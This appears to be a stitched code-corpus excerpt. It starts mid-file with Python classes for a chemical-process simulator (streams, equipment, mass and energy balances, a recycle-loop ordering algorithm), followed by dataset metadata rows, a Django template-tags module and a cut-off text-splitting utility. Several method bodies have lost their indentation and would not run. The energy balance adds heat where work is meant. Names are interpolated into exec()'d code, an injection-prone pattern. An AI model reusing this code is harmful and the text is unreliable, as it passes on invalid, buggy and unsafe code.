self.add_info(**info)
self._update_restriction(self.name)
    def _update_restriction(self, name):
        """(Re)build the flow's mass-fraction restriction equation.

        Dynamically defines a function named
        ``mass_fraction_restriction_<name>`` whose keyword arguments are the
        ``x_<name>_<substance>`` fractions (so the equation-ordering
        algorithm can introspect them) and which delegates to
        :meth:`Flow.restriction`.  If *name* produces invalid Python source,
        the user is prompted for a new name; the accepted name is stored in
        ``self._name``.
        """
        while True:
            # One "x_<flow>_<substance>: None = None," entry per substance.
            generator = (f'x_{name}_{substance.name}: None = None, '
                         for substance in self.composition)
            args = "flow: 'Flow', "
            for entry in generator:
                args += entry
            try:
                # NOTE(review): the exec'd source must be flush-left —
                # indented source would raise IndentationError (a subclass
                # of SyntaxError) and loop forever asking for a new name.
                string =\
f"""
def mass_fraction_restriction_{name}({args}) -> float:
    '''Mass fraction restriction equation (sum(x) = 1).
    This function is created dynamically with the
    :func:`Flow._update_restriction` method. It should not be called by the
    user, but only by the equation ordering algorithm.
    '''
    warn("Do not call protected methods.")
    return Flow.restriction(flow)
self._equations['restriction'] = mass_fraction_restriction_{name}
"""
                exec(string)
                break
            except SyntaxError:
                name = input(
                    f"Invalid name: {name}. Please inform a new name.")
        self._name = name
def _add_connections(
        self, leaves: 'Equipment' = None, enters: 'Equipment' = None):
    """Record which equipment this stream leaves and/or enters.

    Will be useful in the future when we define a :class:`Process` class.
    Endpoints passed as ``None`` are left untouched.
    """
    for attribute, equipment in (("leaves", leaves), ("enters", enters)):
        if equipment is not None:
            setattr(self, attribute, equipment)
def _remove_connections(self, leaves: bool = False, enters: bool = False,
                        equipment: 'Equipment' = None):
    """Method for removing connections.

    Clears the stream's ``leaves``/``enters`` endpoints, either by boolean
    flag or by passing the connected equipment itself.

    TODO: possibly remove 'leaves' and 'enters' arguments, since this
        method should only be called through the remove_flow method (from
        the Equipment class).

    Raises:
        NameError: if ``equipment`` is given but connected to neither end.
    """
    # Nothing requested at all: warn, but fall through harmlessly (all
    # conditions below are false).
    if (not leaves) and (not enters) and equipment is None:
        warn("No connection was removed because None were specified.")
    if leaves:
        # self.leaves.remove_flow(self)
        print(f"Removed {self.leaves.name} from {self.name}.leaves.")
        self.leaves = None
    if enters:
        # self.enters.remove_flow(self)
        print(f"Removed {self.enters.name} from {self.name}.enters.")
        self.enters = None
    if equipment is not None:
        if equipment == self.enters:
            # self.enters.remove_flow(self)
            print(f"Removed {self.enters.name} from {self.name}.enters.")
            self.enters = None
        elif equipment == self.leaves:
            # self.leaves.remove_flow(self)
            print(f"Removed {self.leaves.name} from {self.name}.leaves.")
            self.leaves = None
        else:
            raise NameError(f"Equipment {equipment} isn't connected to this"
                            f" process current {self}."
                            f" It connects {self.leaves} to {self.enters}.")
class Equipment:
    """Class for equipments (process units).

    Streams attach through :meth:`add_inflows`/:meth:`add_outflows`; the
    component mass balances and the energy balance are (re)generated
    dynamically by :meth:`_update_balances`.

    TODO: There still need to be constant updates of the w and x
    quantities.
    """
    def __init__(self, name: str):
        self._name = name            # protected; read via the `name` property
        self.composition = []        # Substance objects present in the unit
        self.w = None                # total flow rate (units not shown here -- TODO confirm)
        self.x = {}                  # mass fraction per Substance
        # Not yet implemented:
        self._reaction = True        # whether a chemical reaction takes place
        self.reaction_list = []
        self.reaction_rate = {}
        self.reaction_rate_mol = {}
        self.inflow = []             # Flow objects entering the equipment
        self.outflow = []            # Flow objects leaving the equipment
        self.equations = {}
        self._equations = {}         # dynamically generated equations
        self.heat = None  # Heat
        self.work = None  # Work
        self.T_ref = None  # Reference Temperature for Enthalpy Calc.
def __str__(self):
    """Use the equipment's name as its string form."""
    return self.name

def __iter__(self):
    """Iterate over every attached stream: outflows first, then inflows."""
    yield from self.outflow
    yield from self.inflow

def __contains__(self, item: Union[Substance, Flow]):
    """Tests if a Substance is present in the equipment, or if a Flow enters
    or leaves it.

    TODO: Add the possibility of item being a string
    """
    return (item in self.inflow
            or item in self.outflow
            or item in self.composition)
@property
def name(self):
    """Read-only access to the equipment's (protected) name."""
    return self._name

@property
def reaction(self):
    """Whether this equipment is treated as reactive (read-only flag)."""
    return self._reaction
@staticmethod
def component_mass_balance(equipment: 'Equipment', substance: Substance) -> float:
"""Component Mass Balance for substance a given substance and equipment.
TODO: maybe raise an error if the return value goes over the tolerance.
"""
if substance not in equipment:
raise TypeError(
f"This equipment does not have this substance in it:"
f" {substance.name}"
)
inflows = equipment.inflow
outflows = equipment.outflow
result = 0
for flow in equipment:
if substance in flow:
if flow.w is None:
raise ValueError(
f"Uninitialized value for flow rate at stream: "
f"{flow.name}")
elif flow.x[substance] is None:
raise ValueError(
f"Uninitialized mass fraction at stream: {flow.name}")
if flow in outflows:
result += flow.w * flow.x[substance]
else:
result -= flow.w * flow.x[substance]
return result
@staticmethod
def energy_balance(equipment: 'Equipment', T_ref: float = None) -> float:
inflows = equipment.inflow
outflows = equipment.outflow
result = 0
if T_ref is None:
if equipment.T_ref is None:
T_ref = equipment.inflow[0].T
equipment.T_ref = T_ref
else:
T_ref = equipment.T_ref
else:
equipment.T_ref = T_ref
for flow in equipment:
for substance in flow:
if flow.w is None:
raise ValueError(
f"Uninitialized value for flow rate at stream:"
f" {flow.name}")
elif flow.x[substance] is None:
raise ValueError(
f"Uninitialized mass fraction at stream: {flow.name}")
else:
if flow in outflows:
sign = 1
elif flow in inflows:
sign = -1
else:
raise RuntimeError(
"Unexpected Error."
" Flow neither in inflow nor outflow")
result += sign * flow.w * flow.x[substance] * \
Substance.cp(substance, flow.T, T_ref) * \
(flow.T - T_ref)
if equipment.heat is not None:
result += equipment.heat
if equipment.work is not None:
result += equipment.heat
return result
def _update_balances(self):
    """Generates the component mass balances for each substance that comes
    into the equipment, as well as the system's energy balance.

    The generated functions (built with ``exec``) encode their variable
    dependencies (W_*, x_*, T_*) as keyword arguments so the equation
    ordering algorithm can read them from the signature.
    """
    name = self.name
    # ---- Component mass balances: one generated function per substance.
    while True:
        try:
            # Pick a substance
            for substance in self.composition:
                w = []
                x = []
                # Pick a stream:
                for flow in self:
                    # If the substance is present on that stream:
                    if substance in flow:
                        w.append(f"W_{flow.name}")
                        mass_fraction = f"x_{flow.name}_{substance.name}"
                        if mass_fraction not in flow._x:
                            raise NameError(
                                f"Mass fraction {mass_fraction} not in the stream."
                                f" Possibly a naming error (check if the naming"
                                f" convention has changed). The stream contains"
                                f" the following mass fractions:\n{flow._x}.")
                        x.append(mass_fraction)
                # mass balance:
                args = "equipment: 'Equipment', substance: Substance, "
                for w_val, x_val in zip(w, x):
                    args += f"{w_val}: None = None, "
                    args += f"{x_val}: None = None, "
                string =\
                    f"""
def component_mass_balance_{name}_{substance.name}({args}) -> float:
    '''Component Mass Balance for substance {substance.name}.
    This function is generated automatically and dynamically by the
    :func:`Equipment._update_mass_balance` method. It should only be used
    by the equation ordering algorithm.
    '''
    warn("Do not call protected methods.")
    return Equipment.component_mass_balance(equipment, substance)
self._equations['mass_balance_{name}_{substance.name}'] = \\
    component_mass_balance_{name}_{substance.name}
"""
                exec(string)
            break
        except SyntaxError:
            # Equipment/substance names are interpolated into identifiers;
            # an invalid name makes the generated source unparsable.
            name = input(
                f"Invalid name: {name}. Please inform a new name."
            )
            self._name = name
    # ---- Energy balance: one generated function for the whole equipment.
    w = []
    x = []
    T = []
    for flow in self:
        T.append(f"T_{flow.name}")
        w.append(f"W_{flow.name}")
        for substance in flow.composition:
            mass_fraction = f"x_{flow.name}_{substance.name}"
            if mass_fraction not in flow._x:
                raise NameError(
                    f"Mass fraction {mass_fraction} not in the stream."
                    f" Possibly a naming error (check if the naming"
                    f" convention has changed). The stream contains"
                    f" the following mass fractions:\n{flow._x}.")
            x.append(mass_fraction)
    # energy balance:
    # For the sake of generality, we'll assume each eqp. will have a T_ref
    args = f"equipment: 'Equipment', Q_{name}: float = None," \
           f" W_{name}: float = None, T_ref_{name}: float = None, "
    for w_val in w:
        args += f"{w_val}: None = None, "
    for x_val in x:
        args += f"{x_val}: None = None, "
    for T_val in T:
        args += f"{T_val}: None = None, "
    # NOTE(review): the mass balances are stored in `self._equations` but
    # the energy balance below goes into `self.equations`; Process.equations()
    # only reads `_equations`, so this looks inconsistent -- TODO confirm.
    string = \
        f"""
def energy_balance_{name}({args}) -> float:
    '''Energy balance for equipment {name}.
    This function is generated automatically and dynamically by the
    :func:`Equipment._update_balances` method. It should only be used
    by the equation ordering algorithm.
    '''
    warn("Do not call protected methods.")
    return Equipment.energy_balance(equipment)
self.equations['energy_balance_{name}'] = \\
    energy_balance_{name}
"""
    exec(string)
def add_inflows(self, *inflows: Flow):
    """Method for adding a current to the inflows.

    Automatically adds new substances to the class's composition attribute.

    Args:
        *inflows: :class:`Flow` objects we want to add to the inflow.
    """
    # Delegates to _add_flow, which also wires up the stream connections.
    self._add_flow("inflow", "outflow", *inflows)

def add_outflows(self, *outflows: Flow):
    """Method for adding a current to the outflows.

    Args:
        *outflows: :class:`Flow` objects we want to add to the outflow.
    """
    self._add_flow("outflow", "inflow", *outflows)
def _add_flow(self, direction: str, other_direction: str, *flows: Flow):
    """Attach streams to the equipment on the given side.

    Streams already attached on either side are skipped with a warning.
    Each newly attached stream is also told about the connection, and the
    equipment's composition is refreshed afterwards.

    Args:
        direction: "inflow" or "outflow".
        other_direction: "outflow" or "inflow".
        flows: :class:`Flow` objects we want to add to the in or outflow.
    """
    target = getattr(self, direction)
    opposite = getattr(self, other_direction)
    for flow in flows:
        if flow in target:
            warn(f"Current {flow} already in {direction}, skipped.")
        elif flow in opposite:
            warn(f"Current {flow} already in {other_direction}, make"
                 f" sure to correctly specify the flow direction. Nothing"
                 f" has been changed.")
        else:
            target.append(flow)
            # Mirror the connection on the stream side.
            if direction == 'inflow':
                flow._add_connections(enters=self)
            elif direction == 'outflow':
                flow._add_connections(leaves=self)
    self.update_composition()
def remove_flow(self, flow: Union[str, Flow]):
    """Method for removing a current from the in and outflows.

    Accepts either the stream object or its name. Every attached stream
    whose name matches is disconnected from this equipment and dropped
    from ``inflow``/``outflow``, then the composition is refreshed.

    Bug fixes: the previous implementation removed items from the very
    lists it was iterating (skipping elements), and could disconnect a
    stale reference instead of the stream actually matched.

    Args:
        flow: Either a :class:`Flow` object or the name of an instance of
            one.

    Raises:
        TypeError: if ``flow`` is neither a string nor a Flow instance.
    """
    if isinstance(flow, Flow):
        name = flow.name
    elif isinstance(flow, str):
        name = flow
    else:
        raise TypeError(f"Invalid type: {type(flow)}."
                        f" Argument must be string or a 'Flow' instance.")
    # Iterate over copies so removal doesn't skip elements.
    for candidate in list(self.inflow):
        if candidate.name == name:
            candidate._remove_connections(equipment=self)
            self.inflow.remove(candidate)
    for candidate in list(self.outflow):
        if candidate.name == name:
            candidate._remove_connections(equipment=self)
            self.outflow.remove(candidate)
    # Updating the equipment's and possibly the outflows' compositions:
    self.update_composition()
def add_reaction(self, **kwargs):
    """Adds a chemical reaction to the equipment. TODO

    Currently only records the keyword arguments in ``reaction_list`` and
    flags the equipment as reactive; the balance equations do not yet use
    this information.

    Args:
        **kwargs: reaction description (format still to be defined).
    """
    self._reaction = True
    self.reaction_list.append(kwargs)
def toggle_reaction(self):
    """Toggle chemical reactions on/off for this equipment.

    Turning reactions *off* asks the user for confirmation first.

    TODO: update everything else that is related to chemical reactions
        (mass balances etc.).

    Returns:
        bool: True when the flag was toggled, False when the user aborted.
    """
    if self._reaction:
        # Bug fix: `sure` was read before assignment (NameError).
        sure = None
        while sure not in ['y', 'n']:
            sure = input(
                "Are you sure you want to toggle chemical reactions off? [y/n]")
        if sure == 'y':
            self._reaction = False
        else:
            return False
    else:
        self._reaction = True
    print(f"Reaction is now {self._reaction}")
    return True
def update_composition(self, update_outflows: bool = False):
    """Updates the equipment's composition attribute, based on its streams.

    This may also update its outflow streams if the equipment's ``reaction``
    attribute is ``False`` (no reaction takes place) and ``update_outflows``
    is True. Pruning outflows during process construction would overwrite
    and delete substances, so it is opt-in; once all connections are
    established, ``update_outflows=True`` may be useful.

    Bug fix: pruning now iterates over a copy of ``composition`` — removing
    from the list being iterated skipped elements.

    .. note::
        This implementation is only valid for an Equipment that does not
        involve a chemical reaction, because it removes substances that
        do not enter the equipment. For an equipment with reaction see
        :class:`Reactor`.
    """
    all_substances = []
    # Every substance entering the equipment must appear in `composition`.
    for flow in self.inflow:
        for substance in flow.composition:
            if substance not in self.composition:
                self.composition.append(substance)
            if substance not in all_substances:
                all_substances.append(substance)
    # Without reactions, substances that never enter cannot be present:
    # prune them (iterate a copy -- see bug fix note above).
    if not self.reaction:
        for substance in list(self.composition):
            if substance not in all_substances:
                self.composition.remove(substance)
    # Every outflow must carry every substance of the equipment; even with
    # a complete reaction the fraction may simply be zero. (Mass balances
    # with reaction haven't yet been implemented: TODO.)
    for flow in self.outflow:
        for substance in self.composition:
            if substance not in flow:
                flow.add_substances(substance)
    # Opt-in pruning of the outflows when there are no reactions.
    if not self.reaction and update_outflows:
        for flow in self.outflow:
            for substance in list(flow.composition):
                if substance not in self.composition:
                    # NOTE(review): called as Substance.remove_substances(flow, ...)
                    # -- looks like it should be flow.remove_substances(substance);
                    # kept as-is pending confirmation.
                    Substance.remove_substances(flow, substance)
    self._update_balances()
class Process:
    """Process object.

    Aggregates Equipment and Flow objects into one flowsheet; see
    :meth:`sequential` and :meth:`add_objects` for building it.
    """
    def __init__(self):
        self.equipments = []  # Equipment objects in this process
        self.streams = []     # Flow (stream) objects in this process
def sequential(self, *args: Union[Flow, Equipment]):
sequence = [None]
for arg in args:
print(arg.name)
if isinstance(arg, Flow):
setattr(self, arg.name, arg)
if isinstance(sequence[-1], Equipment):
eqp = sequence[-1]
arg.add_substances(
*(substance for substance in eqp.composition))
eqp.add_outflows(arg)
sequence.append(arg)
self.streams.append(arg)
elif isinstance(arg, Equipment):
setattr(self, arg.name, arg)
if isinstance(sequence[-1], Flow):
flw = sequence[-1]
arg.add_inflows(flw)
sequence.append(arg)
self.equipments.append(arg)
else:
raise TypeError(f"Invalid argument type: {type(arg)}."
f"Excpected Flow or Equipment.")
def update_compositions(self, update_outflows: bool = False):
    """Propagate compositions along every stream of the process.

    For each stream: pull missing substances from the equipment it leaves,
    then register and refresh the equipment it enters.
    May be unfinished.
    """
    for stream in self.streams:
        source = stream.leaves
        if source is not None:
            missing = [substance for substance in source.composition
                       if substance not in stream.composition]
            stream.add_substances(*missing)
            print(stream.name,
                  source.name,
                  *(substance.name for substance in stream.composition)
                  )
        destination = stream.enters
        if destination is not None:
            if destination not in self.equipments:
                self.equipments.append(destination)
            print(stream.name,
                  destination.name)
            destination.update_composition(update_outflows)
def add_objects(self, *args):
    """Register streams and equipments with the process.

    Each object is appended to the matching registry (``streams`` or
    ``equipments``) and exposed as a process attribute under its name.

    Raises:
        TypeError: for anything that is neither a Flow nor an Equipment.
    """
    for arg in args:
        if isinstance(arg, Flow):
            registry = self.streams
        elif isinstance(arg, Equipment):
            registry = self.equipments
        else:
            raise TypeError(f"Invalid object type: {arg}, type {type(arg)}")
        registry.append(arg)
        setattr(self, arg.name, arg)
def equations(self) -> Generator:
    """Yield every generated equation of the process.

    Equipment equations come first, then stream equations, each in
    registration order.
    """
    for equipment in self.equipments:
        yield from equipment._equations.values()
    for flow in self.streams:
        yield from flow._equations.values()
def graph(self):
    """Draw the process flowsheet as a directed graph.

    Equipments become nodes, streams become labelled edges; streams with a
    missing endpoint get synthetic ``IN n``/``OUT n`` terminal nodes. Uses
    networkx for layout/drawing and matplotlib to display (blocking). The
    built graph is stored on ``self._graph``.
    """
    graph = nx.DiGraph()
    graph.add_nodes_from(
        list(equipment.name for equipment in self.equipments)
    )
    edge_list = []
    label_dict = {}
    entrance_nb = 1
    exit_nb = 1
    # TODO: fix bug (<-F4->, <-F9->)
    # Actually, we have F4 stacked on top of F3. Analogous for F9
    # Think of how to adapt this. A botch may need to be done
    # (DiGraph keeps a single edge per node pair, so parallel streams
    # between the same two units overwrite each other's label.)
    for stream in self.streams:
        if stream.leaves is None:
            leave_str = f'IN {entrance_nb}'
            entrance_nb += 1
        else:
            leave_str = str(stream.leaves)
        if stream.enters is None:
            enter_str = f'OUT {exit_nb}'
            exit_nb += 1
        else:
            enter_str = str(stream.enters)
        print(stream, (leave_str, enter_str))
        edge_list.append(
            (leave_str, enter_str)
        )
        label_dict[(leave_str, enter_str)] = stream.name
    graph.add_edges_from(edge_list)
    options = {
        'with_labels': True,
        'node_color': 'lightgray',
        'node_size': 2000
    }
    # for index, node in enumerate(graph.nodes()):
    #     graph.nodes[node]['subset'] = index//3
    # pos = nx.multipartite_layout(graph, subset_key='subset')
    pos = nx.planar_layout(graph)
    nx.draw(graph, pos, **options)
    nx.draw_networkx_edge_labels(graph, pos, edge_labels=label_dict)
    fig = plt.gcf()
    fig.set_size_inches(12, 6)
    self._graph = graph
    plt.show()
def moa(process: Process, *known_variables):
    """Module ordering algorithm.

    Orders different process modules (equipments) in order for solving
    problems: walks the flowsheet from every process inlet, records the
    cycles (recycle loops) it finds, deduplicates them, and builds a
    cycle/stream incidence matrix used to pick tear streams (the stream
    cutting the most remaining cycles is chosen first).

    Bug fix: cycle deduplication previously removed items from
    ``cycle_list`` while iterating over it, which can skip elements; it now
    builds a new list keeping first occurrences.

    Args:
        process: A :class:`Process` object with all of connected equipments
            and streams for ordering.
        *known_variables: The variables that are considered to be known.
            (Currently unused — reserved for future use.)

    Returns:
        The list of cycles found, each a ``(stream_list, equipment_list)``
        tuple.
    """
    def check_bifurcations(
            stream_list: list, equipment_list: list, bifurcation_dict: dict):
        """Backtrack to the most recent equipment with an unexplored outflow.

        Returns ``None`` when no bifurcation is left, otherwise the
        truncated ``(stream_list, equipment_list, bifurcation_dict,
        new_stream)`` to continue from.
        """
        # Walk the equipment list backwards, looking for bifurcations left
        # in the bifurcation dictionary.
        eqp_iter = equipment_list.copy()
        eqp_iter.pop(-1)  # ignoring the equipment we've just added
        eqp_iter.reverse()  # going backwards
        for eqp in eqp_iter:
            if eqp.name in bifurcation_dict:
                if len(bifurcation_dict[eqp.name]) == 0:
                    continue
                new_stream = bifurcation_dict[eqp.name][-1]
                print(f"Bifurcation: taking stream {new_stream.name}",
                      f"from equipment {eqp.name}.")
                bifurcation_dict[eqp.name].pop(-1)
                # Getting the equipment's position in the list
                idx = equipment_list.index(eqp)
                # We continue from the bifurcation:
                stream_list = stream_list[:idx + 1]
                equipment_list = equipment_list[:idx + 1]
                print(f"Updated stream and equipment lists:\n",
                      *(stm.name for stm in stream_list), '\n',
                      *(eqp.name for eqp in equipment_list), '\n')
                break  # the for loop.
        else:
            return None  # No bifurcations left.
        return stream_list, equipment_list, bifurcation_dict, new_stream

    # Picking the first streams: every stream that leaves no equipment is
    # a process inlet.
    entering_streams = []
    for stream in process.streams:
        if stream.leaves is None:
            entering_streams.append(stream)
    cycle_list = []
    studied_equipments = []
    bifurcations = {}
    for entering_stream in entering_streams:
        current_stream = entering_stream
        print("################# Entering through", entering_stream)
        stm_list = []
        eqp_list = []
        # update list of studied equipments
        for cycle in cycle_list:
            _, saved_eqps = cycle
            for equipment in saved_eqps:
                if equipment not in studied_equipments:
                    studied_equipments.append(equipment)
        while True:
            print(f"Current Stream: {current_stream.name}")
            equipment = current_stream.enters
            # If equipment already in the list, then we have a cycle:
            if equipment in eqp_list:
                stm_list.append(current_stream)
                eqp_list.append(equipment)
                print("Cycle detected:", *(eqp.name for eqp in eqp_list))
                idx = eqp_list.index(equipment)
                cycle_list.append((stm_list[idx + 1:], eqp_list[idx:]))
                tup = check_bifurcations(stm_list, eqp_list, bifurcations)
                if tup is None:
                    print("End of the process.")
                    break  # the while loop
                stm_list, eqp_list, bifurcations, current_stream = tup
                continue
            else:
                stm_list.append(current_stream)
                eqp_list.append(equipment)
            if equipment is None or equipment in studied_equipments:
                if equipment is None:
                    print("This stream leaves the process")
                else:
                    print(f"This path has already been studied (equipment"
                          f" {equipment.name}).")
                tup = check_bifurcations(stm_list, eqp_list, bifurcations)
                if tup is None:
                    print("End of the process.")
                    break  # the while loop
                stm_list, eqp_list, bifurcations, current_stream = tup
                continue
            else:
                print(f"Leads to: {equipment.name}")
                out_streams = equipment.outflow.copy()
                if len(out_streams) == 1:
                    current_stream = out_streams[0]
                elif len(out_streams) < 1:
                    # (fixed typo: "ouflow")
                    raise ValueError(f"Empty outflow for equipment {equipment}.")
                else:
                    print("Equipment with bifurcation, possible outflows:",
                          *(stm.name for stm in out_streams))
                    current_stream = out_streams[-1]
                    out_streams.pop(-1)
                    # Add bifurcations bifurcation list:
                    bifurcations[equipment.name] = out_streams
    # Now for defining the actual order in which we'll solve the system.
    # We first create a matrix in which we list the streams and the cycles
    # they appear in.
    # I have to check for known variables though... (TODO)
    # Checking for repeated cycles: deduplicate, keeping first occurrences
    # (the old remove-while-iterating version could skip elements).
    unique_cycles = []
    for cycle in cycle_list:
        if cycle not in unique_cycles:
            unique_cycles.append(cycle)
    cycle_list = unique_cycles
    # Incidence matrix: rows = cycles, columns = streams.
    inmx = np.zeros((len(cycle_list), len(process.streams)))
    for row, cycle in enumerate(cycle_list):
        stream_list, _ = cycle
        for stream in stream_list:
            print(stream.name)
            col = process.streams.index(stream)
            inmx[row, col] = 1
    print(len(process.streams))
    print(*(stream.name for stream in process.streams))
    stream_order = []
    while inmx.sum():  # While the incidence matrix isn't zero:
        fig, ax = plt.subplots(1, 1)
        ax.imshow(inmx)
        ax.set_xticks([i for i in range(len(process.streams))])
        ax.set_xticklabels([stream.name for stream in process.streams])
        ax.set_yticks([i for i in range(len(cycle_list))])
        ax.set_yticklabels([i + 1 for i in range(len(cycle_list))])
        ax.set_ylabel("Cycles")
        ax.set_xlabel("Streams")
        plt.show(block=True)
        # Tear the stream appearing in the most remaining cycles, then
        # zero out every cycle (row) that stream covers.
        col_sum = inmx.sum(axis=0)
        idx = np.argmax(col_sum)
        stream_order.append(process.streams[idx])
        inmx[inmx[:, idx] == 1] = 0
    print(*(stream.name for stream in stream_order))
    return cycle_list
if __name__ == '__main__':
    # Demo: a small equation-ordering smoke test, then a flowsheet with
    # recycles exercising Process.sequential and moa().
    def f1(x1, x2):
        return None

    def f2(x1, x2, x3, x4):
        return None

    def f3(x3, x4):
        return None

    def f4(x4, x5):
        return None

    # aoe2: equation ordering — presumably defined earlier in this module
    # (not visible here).
    _ = aoe2(f1, f2, f3, f4, x1=1)
    from main import *
    from substances import *
    p = Process()
    F1 = Flow("F1")
    F2 = Flow("F2")
    F3 = Flow("F3")
    F4 = Flow("F4")
    F5 = Flow("F5")
    F6 = Flow("F6")
    F7 = Flow("F7")
    F8 = Flow("F8")
    F9 = Flow("F9")
    A = Equipment("A")
    B = Equipment("B")
    C = Equipment("C")
    D = Equipment("D")
    # Main train: F1 -> A -> F2 -> B -> F4 -> D -> F6 -> C -> F7
    p.sequential(
        F1,
        A,
        F2,
        B,
        F4,
        D,
        F6,
        C,
        F7
    )
    # Recycle/side streams wired up manually.
    p.add_objects(F3, F5, F7, F8, F9)
    p.A.add_inflows(F3, F8)
    p.B.add_inflows(F5, F7)
    p.B.add_outflows(F3)
    p.D.add_outflows(F5, F8, F9)
    F1.add_substances(Water)
    p.update_compositions()
    print(A.composition)
    cycle_list = moa(p)
    # Printing the cycles
    for cycle in cycle_list:
        for data in cycle:
            print(*(arg.name for arg in data))
    # Captured reference output of the run above:
    """Output:
UserWarning: No substances informed.
warn("No substances informed.")
F1
A
F2
B
F4
D
F6
C
F7
F1 A
F2 A Water
F2 B
F4 B Water
F4 D
F6 D Water
F6 C
F7 C Water
F7 B
F3 B Water
F3 A
F5 D Water
F5 B
F7 C Water
F7 B
F8 D Water
F8 A
F9 D Water
[<class 'substances.Water'>]
################# Entering through F1
Current Stream: F1
Leads to: A
Current Stream: F2
Leads to: B
Equipment with bifurcation, possible outflows: F4 F3
Current Stream: F3
Cycle detected: A B A
Bifurcation: taking stream F4 from equipment B.
Updated stream and equipment lists:
F1 F2
A B
Current Stream: F4
Leads to: D
Equipment with bifurcation, possible outflows: F6 F5 F8 F9
Current Stream: F9
This stream leaves the process
Bifurcation: taking stream F8 from equipment D.
Updated stream and equipment lists:
F1 F2 F4
A B D
Current Stream: F8
Cycle detected: A B D A
Bifurcation: taking stream F5 from equipment D.
Updated stream and equipment lists:
F1 F2 F4
A B D
Current Stream: F5
Cycle detected: A B D B
Bifurcation: taking stream F6 from equipment D.
Updated stream and equipment lists:
F1 F2 F4
A B D
Current Stream: F6
Leads to: C
Current Stream: F7
Cycle detected: A B D C B
End of the process.
# [comment] The cycles identified (raw output after comment):
# [comment] outputs must still be adapted to only show the actual
# [comment] cycle streams and equipments, now it shows the whole path.
F1 F2 F3
A B A
F1 F2 F4 F8
A B D A
F1 F2 F4 F5
A B D B
F1 F2 F4 F6 F7
A B D C B
"""
| 35.585806 | 105 | 0.538906 |
7930134972a27ddb372f9b29206b46d022e175d6 | 3,985 | py | Python | src/cobra/templatetags/helper_tags.py | lyoniionly/django-cobra | 2427e5cf74b7739115b1224da3306986b3ee345c | [
"Apache-2.0"
] | 1 | 2015-01-27T08:56:46.000Z | 2015-01-27T08:56:46.000Z | src/cobra/templatetags/helper_tags.py | lyoniionly/django-cobra | 2427e5cf74b7739115b1224da3306986b3ee345c | [
"Apache-2.0"
] | null | null | null | src/cobra/templatetags/helper_tags.py | lyoniionly/django-cobra | 2427e5cf74b7739115b1224da3306986b3ee345c | [
"Apache-2.0"
] | null | null | null | from __future__ import absolute_import
import six
from datetime import timedelta
from django import template
from django.conf import settings
from django.utils import timezone
from django.utils.translation import ugettext as _, get_language
from cobra.core.javascript import to_json
from cobra.core.loading import get_model, get_class
from cobra.core.utils import multi_get_letter, get_datetime_now
from cobra.apps.accounts.utils import get_default_avatar_url, get_user, get_avatar_url as get_avatar_url_util
from cobra.core.compat import get_user_model
from cobra.core.http import absolute_uri
from cobra.core import locale
from cobra.core.dates import epoch
register = template.Library()
register.filter(to_json)
@register.filter
def needs_access_group_migration(user, organization):
AccessGroup = get_model('accessgroup', 'AccessGroup')
OrganizationMember = get_model('organization', 'OrganizationMember')
OrganizationMemberType = get_class('organization.utils', 'OrganizationMemberType')
has_org_access_queryset = OrganizationMember.objects.filter(
user=user,
organization=organization,
has_global_access=True,
type__lte=OrganizationMemberType.ADMIN,
)
if not (user.is_superuser or has_org_access_queryset.exists()):
return False
return AccessGroup.objects.filter(
team__organization=organization
).exists()
@register.simple_tag
def get_avatar_url(user, size=settings.COBRA_ACCOUNTS_AVATAR_DEFAULT_SIZE):
return get_avatar_url_util(user, size)
@register.inclusion_tag('partials/_avatar_tag.html')
def get_avatar(user, size=settings.COBRA_ACCOUNTS_AVATAR_DEFAULT_SIZE, **kwargs):
if not isinstance(user, get_user_model()):
try:
user = get_user(user)
alt = six.text_type(user)
url = get_avatar_url(user, size)
except get_user_model().DoesNotExist:
url = get_default_avatar_url()
alt = _("Default Avatar")
else:
alt = six.text_type(user)
url = get_avatar_url(user, size)
context = dict(kwargs, **{
'user': user,
'url': url,
'alt': alt,
'size': size,
})
return context
@register.filter
def user_display_name(user):
return user.get_full_name() or user.username
@register.inclusion_tag('partials/project_avatar.html')
def get_project_avatar(project, css_class=''):
has_avatar = False
cxt = {'project': project}
if project.avatar:
has_avatar = True
else:
allowed_colors = {
'red': 'FFEBEE',
'purple': 'F3E5F5',
'indigo': 'E8EAF6',
'blue': 'E3F2FD',
'teal': 'E0F2F1',
'orange': 'FBE9E7',
'gray': 'EEEEEE'
}
css_class += ' identicon'
bg_key = project.id % 7
style = "background-color: #%s; color: #555" % allowed_colors.values()[bg_key]
first_cap = multi_get_letter(project.name)[0]
cxt.update({'style': style, 'first_cap': first_cap.upper()})
cxt.update({'has_avatar': has_avatar, 'css_class': css_class, })
return cxt
@register.filter
def timesince_ago(value, now=None):
from django.template.defaultfilters import timesince
if now is None:
now = timezone.now()
if not value:
return _('never')
if value < (now - timedelta(days=5)):
return value.date()
value = (' '.join(timesince(value, now).split(' ')[0:2])).strip(',')
if value == _('0 minutes'):
return _('just now')
if value == _('1 day'):
return _('yesterday')
return value + _(' ago')
@register.filter
def absolute_url(url):
return absolute_uri(url)
@register.assignment_tag
def moment_locale():
locale_mapping = getattr(settings, 'MOMENT_LOCALES',
locale.LOCALE_MAPPING)
return locale_mapping.get(get_language(), 'en')
@register.simple_tag
def now_epoch():
return epoch(get_datetime_now(), msec=True) | 29.962406 | 109 | 0.677541 |
bb134329973bfa0d6a1f2685165d0cd29ba44759 | 1,038 | py | Python | Utils.py | YungRAW/ComputerScienceLicense---PlagiarismChecker | 411199d4d8cb33dbeebc0f204c46d74c976fb9cd | [
"MIT"
] | 10 | 2020-06-29T13:18:22.000Z | 2021-07-29T02:19:54.000Z | Utils.py | YungRAW/ComputerScienceLicense---PlagiarismChecker | 411199d4d8cb33dbeebc0f204c46d74c976fb9cd | [
"MIT"
] | 1 | 2020-08-20T17:29:31.000Z | 2020-08-20T19:43:12.000Z | Utils.py | YungRAW/ComputerScienceLicense---PlagiarismChecker | 411199d4d8cb33dbeebc0f204c46d74c976fb9cd | [
"MIT"
] | 2 | 2021-08-24T18:57:20.000Z | 2022-02-17T00:31:02.000Z | import re
def split_text_max_words(lines, max_words):
    """Split *lines* into sentence chunks of at most *max_words* words.

    Sentences are detected at ". <Uppercase>" or ".\\n" boundaries; only
    sentences of at least 5 words are kept (shorter fragments, and any
    trailing text after the last boundary, are dropped). Each kept
    sentence is then cut into word chunks of at most *max_words*.

    Fix: the regex is now a raw string (the old "\\. " literal relied on an
    invalid escape sequence) and is compiled once.

    Args:
        lines: iterable of text lines to process.
        max_words: maximum number of words per returned chunk.

    Returns:
        list[str]: the word chunks, in document order.
    """
    sentence_boundary = re.compile(r"\. [A-Z]|\.\n")
    sentences = []
    for line in lines:
